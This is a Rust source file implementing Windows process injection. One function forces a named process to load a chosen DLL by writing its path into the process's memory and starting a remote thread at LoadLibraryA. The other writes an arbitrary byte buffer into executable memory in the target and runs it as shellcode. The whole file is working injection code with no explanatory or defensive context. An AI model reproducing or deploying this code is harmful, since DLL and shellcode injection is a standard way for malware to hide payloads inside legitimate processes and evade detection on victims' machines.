#[allow(unused_imports)]
use kernel32::{GetModuleHandleA, VirtualAllocEx, CreateRemoteThread, CloseHandle};
use kernel32::GetProcAddress;
use sysinfo::{PidExt, SystemExt, ProcessExt};
use std::ptr;
use std::ffi::CString;
use winapi::shared::minwindef::LPVOID;
use winapi::um::memoryapi::WriteProcessMemory;
use winapi::um::winnt::{PROCESS_ALL_ACCESS,MEM_COMMIT,MEM_RESERVE,PAGE_EXECUTE_READWRITE};
use winapi::shared::minwindef::FALSE;
extern crate kernel32;
extern crate winapi;



#[allow(non_snake_case)]

pub fn load_dll(pname:&str,file_path:&str){
let mut s = sysinfo::System::new_all();
s.refresh_all();
let mut p_id:u32 = 0;
for p in s.processes_by_name(pname){
    p_id= p.pid().as_u32();
}

 let dll_path = file_path;
 let dll_path_str = CString::new(dll_path).unwrap();
 let dll_path_size = dll_path_str.as_bytes_with_nul().len();
 

 unsafe {
    let handle = kernel32::OpenProcess(PROCESS_ALL_ACCESS,FALSE,p_id);

    let modulename = CString::new("Kernel32.dll").unwrap();
    let libraryname = CString::new("LoadLibraryA").unwrap();
   
    let loadlib = GetProcAddress(GetModuleHandleA(modulename.as_ptr()),libraryname.as_ptr());
    
   
    let VA = VirtualAllocEx(handle,ptr::null_mut(),(dll_path_size+1) as u64, MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    let mut n = 0;
    WriteProcessMemory(handle,VA,dll_path_str.as_ptr() as LPVOID,dll_path_size,&mut n);
    let _remoteThread = CreateRemoteThread(handle,ptr::null_mut(),0,Some(std::mem::transmute(loadlib)),VA,0,ptr::null_mut());
    CloseHandle(handle);
 };
}


pub fn code_inject(pname:&str,buff:Vec<u8>){
let mut s = sysinfo::System::new_all();
s.refresh_all();
let mut p_id:u32 = 0;
for p in s.processes_by_name(pname){
    p_id= p.pid().as_u32();
}

 unsafe{
        let handle = kernel32::OpenProcess(PROCESS_ALL_ACCESS,FALSE,p_id);
    
       
        let VA = VirtualAllocEx(handle,ptr::null_mut(),buff.len() as u64, MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        let mut n = 0;
        WriteProcessMemory(handle,VA,buff.as_ptr() as LPVOID,buff.len(),&mut n);
        let _remoteThread = CreateRemoteThread(handle,ptr::null_mut(),0,Some(std::mem::transmute(VA)),VA,0,ptr::null_mut());
        CloseHandle(handle);
    }

}
